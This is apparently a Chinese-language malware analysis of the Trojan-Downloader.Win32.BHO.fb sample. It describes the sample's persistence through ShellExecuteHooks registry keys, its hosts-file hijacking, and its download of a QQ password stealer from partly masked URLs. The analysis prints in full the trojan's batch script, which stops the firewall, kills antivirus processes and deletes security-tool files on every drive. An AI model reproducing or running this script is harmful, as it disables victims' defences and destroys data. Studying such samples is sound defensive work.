Come_system.dll,Trojan-Downloader.Win32.BHO.fb

Trojan-Downloader.Win32.BHO.fb该样本程序被执行后，在目录C:\Program Files\Common Files\Microsoft Shared\MSInfo\下释放批处理文件“mfc.bat”，文件内容如下，作用为拷贝自身到%windir%\system32\目录，重命名为 “cmd.bat”，并设置其属性为“只读，隐藏，系统”，通过“net stop”命令停止“WINDOWS默认防火墙”与“影子系统”的服务，结束 “360safe.exe”与“RStray.exe”进程，遍历硬盘所有目录删除 “360*”与 “修复*”、 “Rstray*”的文件。

@echo off
set s=TASKKILL
copy %0 %windir%\system32\cmd.bat
attrib %windir%\system32\cmd.bat +r +s +h
net stop sharedaccess >nul
%s% /im 360* /f >nul
%s% /im RStray /f >nul
net stop Shadow" "System" "Service
set alldrive=d e f g h i j k l m n o p q r s t u v w x y z
for %%a in (c %alldrive%) do del %%a:\360* /f /s /q >nul
for %%a in (c %alldrive%) do del %%a:\修复* /f /s /q >nul
for %%a in (c %alldrive%) do del %%a:\RStray* /f /s /q >nul

在目录%SystemRoot%\system32\drivers\etc\下释放文件“hosts”以覆盖原有文件并修改其属性为“系统”、“隐藏”，劫持大量域名到127.0.0.1；拷贝自身到目录C:\Program Files\Common Files\Microsoft Shared\MSInfo\下重命名为“Come_system.dll”，并在同一目录下释放文件动态链接库文件 “Come_System.sys”，修改上述文件属性为“系统”、“隐藏”；修改如下注册表健值，使得“Explorer”及其子进程启动时自动加载文件“Come_System.sys”，后使用批处理执行自删除。

项：HKLM\SOFTWARE\Classes\CLSID\{5B77087D-AB76-4C22-B0A6-C34D1F438E55}\InProcServer32\
指向数据：
C:\Program Files\Common Files\Microsoft Shared\MSInfo\Come_System.sys

项：HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks\
健值：{5B77087D-AB76-4C22-B0A6-C34D1F438E55}
指向数据为空

动态库文件“Come_System.sys”被装载运行后，查看当前进程是否存在“QQS010TP.Exe”，如存在则退出；遍历进程查找“CMD.EXE”和“cmd.exe”，存在则结束；联网访问“http://ovo.o***ov.cn/windowsupdate/up.exe”与“http://www.zm***yy.cn/down/”下载木马“ko.exe”并运行，“ko.exe”用于盗取用户QQ账号和密码；访问恶意网址“http://www.j***zmj.cn/exe.jpg”，“http://w.q***c.cn/getmac.jsp”，“http://www.j***zmj.cn/cc.jpg”以及“http://www.j***zmj.cn/ad.jpg”进行刷流量、获取用户MAC地址等其他恶意行为